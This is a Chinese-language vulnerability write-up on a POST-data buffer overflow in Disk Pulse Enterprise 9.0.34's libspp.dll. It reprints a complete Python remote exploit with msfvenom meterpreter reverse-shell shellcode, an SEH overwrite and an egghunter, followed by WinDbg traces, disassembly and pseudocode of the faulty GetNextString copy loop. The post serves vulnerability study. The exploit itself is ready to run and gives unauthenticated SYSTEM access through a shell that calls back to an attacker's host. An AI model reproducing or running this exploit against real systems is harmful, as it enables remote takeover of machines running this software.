作者:k0shl 转载请注明出处:http://whereisk0shl.top
漏洞说明
软件下载:
https://www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe
PoC:
#!/usr/bin/python
print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit"
print "Author: Tulpa // tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa-security.com
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
#Special Shoutout to unfo- for making me look closer
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.132',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
#pop pop ret 1001A333
nseh = "\x90\x90\xEB\x0B"
seh = "\x33\xA3\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12292 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
测试环境:
Windows xp sp3
IDA pro
Windbg
这里PoC履行了exploit功能,使用的是mona的egghunter,在调试的时候,可以把seh和egghunter包括payload部分全部替换成畸形字符串 \x41,运行Disk Pulse Enterprise,可以看到80端口开放,这时候执行PoC,引发软件崩溃。
漏洞复现
Disk Pulse Eneterprise是一款监视磁盘变化的软件,它可以通过一个管理端口9120或者web管理窗口80对软件进行连接管理,从而监视磁盘的变化情况。在Disk Pulse Eneterprise中有一个动态链接库libspp.dll,其中有一些负责http操作的函数,问题就出现在这个动态链接库中,在处理post数据时,由于对于post数据没有进行严格的长度控制,导致在执行获取post数据时向无效内存拷贝数据造成缓冲区溢出,触发seh异常行为处理,最后控制eip,执行任意代码。下面对此漏洞进行详细分析。
首先发送payload,另一边触发崩溃,附加windbg,到达漏洞位置。
(7dc.10c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000386b ebx=00004268 ecx=016fd041 edx=0000384c esi=016fc7b4 edi=0016b6a4
eip=10092822 esp=016fba70 ebp=016fcfd8 iopl=0 nv up ei ng nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287
libspp!SCA_HttpParser::GetNextString+0x52:
10092822 880c32 mov byte ptr [edx+esi],cl ds:0023:01700000=??这里调用了libspp.dll的SCA_HttpParser的GetNextString函数,接下来程序进入SHE异常行为处理,通过覆盖SEH Handler打到代码执行。
0:011> g
(7dc.10c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000
eip=41414141 esp=016fb6a0 ebp=016fb6c0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???漏洞分析
在libspp中SCA_HttpParse类负责处理HTTP的一些相关操作,其中有一个函数名为ExtractPostData负责处理post数据,在这个函数入口下断点。
0:011> bp 10092510
*** WARNING: Unable to verify checksum for C:\Program Files\Disk Pulse Enterprise\bin\libspp.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Disk Pulse Enterprise\bin\libspp.dll -
0:011> bl
0 e 10092510 0001 (0001) 0:**** libspp!SCA_HttpParser::ExtractPostData
0:011> g
Breakpoint 0 hit
eax=0000016c ebx=016fd120 ecx=016fd00c edx=0016b6a4 esi=016fd730 edi=101b0c42
eip=10092510 esp=016fcfb4 ebp=016fd00c iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
libspp!SCA_HttpParser::ExtractPostData:
10092510 b810150000 mov eax,1510h发送payload之后命中断点,此时观察一下传参情况。
0:011> dd esp
016fcfb4 10091d23 0016b6a4 00004268 016fcfd8
016fcfc4 016fd730 0016d771 000043d4 00b1a310
0:011> dc 0016b6a4
0016b6a4 72657375 656d616e 6d64613d 70266e69 username=admin&p
0016b6b4 77737361 3d64726f 61616161 410a0d61 assword=aaaaa..A
0016b6c4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6d4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6e4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6f4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b704 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAApost数据作为第二个参数传入,注意是完整传入,这里继续单步跟踪,到达之前说到的GetNextString函数。
0:011> p
eax=0016b6a4 ebx=00000000 ecx=016fd00c edx=00004268 esi=016fd730 edi=016fd00c
eip=10092554 esp=016fba84 ebp=016fd00c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
libspp!SCA_HttpParser::ExtractPostData+0x44:
10092554 e877020000 call libspp!SCA_HttpParser::GetNextString (100927d0)
0:011> dd esp
016fba84 0016b6a4 00004268 016fcfd8 016fc7b4
0:011> dc poi(esp)
0016b6a4 72657375 656d616e 6d64613d 70266e69 username=admin&p
0016b6b4 77737361 3d64726f 61616161 410a0d61 assword=aaaaa..A
0016b6c4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6d4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6e4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA这个函数会做一件事情,就是将第一个参数,也就是post数据进行拆分,将每一部分分离出来作为后续处理,单步步过,可以看到第一次进入GetNextString之后,拆分了第一个数据。
0:011> p
eax=00000001 ebx=00000000 ecx=016fd026 edx=0000000e esi=016fd730 edi=016fd00c
eip=10092559 esp=016fba94 ebp=016fd00c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
libspp!SCA_HttpParser::ExtractPostData+0x49:
10092559 85c0 test eax,eax
0:011> dd 016fcfd8
016fcfd8 0000000e 1008cc39 0016b538 000043d4
016fcfe8 0000016c 016fd120 00000000 00b1a310
0:011> dc 16fc7b4
016fc7b4 72657375 656d616e 6d64613d 00006e69 username=admin..第一次分离出来了username,接下来,再次进入GetNextString开始拆分第二个String,这个拆分过程会执行一系列的拷贝操作。
.text:10092814 loc_10092814: ; CODE XREF: SCA_HttpParser::GetNextString(char const *,ulong,ulong *,char *)+5E_x0019_j
.text:10092814 cmp cl, 0Ah
.text:10092817 jz short loc_10092830
.text:10092819 cmp cl, 0Dh
.text:1009281C jz short loc_10092830
.text:1009281E cmp eax, ebx
.text:10092820 jnb short loc_10092830
.text:10092822 mov [edx+esi], cl
.text:10092825 mov cl, [eax+edi+1]
.text:10092829 inc edx
.text:1009282A inc eax
.text:1009282B cmp cl, 26h
.text:1009282E jnz short loc_10092814这个loc块负责拷贝,其中10092822地址就是触发漏洞的关键位置,esi是待拷贝的缓冲区首地址,edx是拷贝长度,cl是拷贝内容,这里是一个字一个字拷贝的。
因此,当超过开辟缓冲区大小的时候,就会引发向无效地址拷贝的问题。
eax=0000386b ebx=00004268 ecx=016fd041 edx=0000384c esi=016fc7b4 edi=0016b6a4
eip=10092822 esp=016fba70 ebp=016fcfd8 iopl=0 nv up ei ng nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287
libspp!SCA_HttpParser::GetNextString+0x52:
10092822 880c32 mov byte ptr [edx+esi],cl ds:0023:01700000=??看一下edx+esi的值,可以看到,后面已经超过了开辟缓冲区的大小,后面就是无效缓冲区了。
0:011> dc 016fc7b4+3840
016ffff4 41414141 41414141 41414141 ???????? AAAAAAAAAAAA????
01700004 ???????? ???????? ???????? ???????? ????????????????
01700014 ???????? ???????? ???????? ???????? ????????????????之后来看一下ecx的值
0:011> dd ecx
016fd041 41414141 41414141 41414141 41414141
016fd051 41414141 41414141 41414141 41414141
016fd061 41414141 41414141 41414141 41414141
016fd071 41414141 41414141 41414141 41414141
016fd081 41414141 41414141 41414141 41414141
016fd091 41414141 41414141 41414141 41414141cl就是将ecx的低地址一个字节一个字节拷贝,这里由于向无效地址拷贝,引发SEH异常处理,最后达到代码执行,来看一下伪代码。
int __thiscall SCA_HttpParser::ExtractPostData(SCA_HttpParser *this, const char *a2, unsigned __int32 a3, unsigned __int32 *a4, struct
SCA_ConfigObj *a5)
{
v19 = this;
v16 = 0;
v18 = 0;
v17 = 0;
if ( SCA_HttpParser::GetNextString(a2, a3, a4, &v28) )
{
while ( 1 )
{
……
LABEL_18:
if ( !SCA_HttpParser::GetNextString(a2, a3, a4, &v28) )
return 1;
}
v15 = 1;
goto LABEL_17;
}
return 1;
}再来看一下GetNextString函数的伪代码。
int __stdcall SCA_HttpParser::GetNextString(const char *a2, unsigned __int32 a3, unsigned __int32 *a4, char *a5)
{
int v4; // edx@1
unsigned __int32 i; // eax@1
char v6; // cl@2
char v7; // cl@6
int result; // eax@13
v4 = 0;
for ( i = *a4; i < a3; ++i )
{
v6 = a2[i];
if ( v6 != 38 && v6 != 10 && v6 != 13 )
break;
}
v7 = a2[i];
if ( v7 && i < a3 )
{
for ( ; v7 != 38; ++i )
{
if ( v7 == 10 )
break;
if ( v7 == 13 )
break;
if ( i >= a3 )
break;
a5[v4] = v7;
v7 = a2[i + 1];
++v4;
}
a5[v4] = 0;
*a4 = i;
result = 1;
}
else
{
result = 0;
}
return result;
}Comments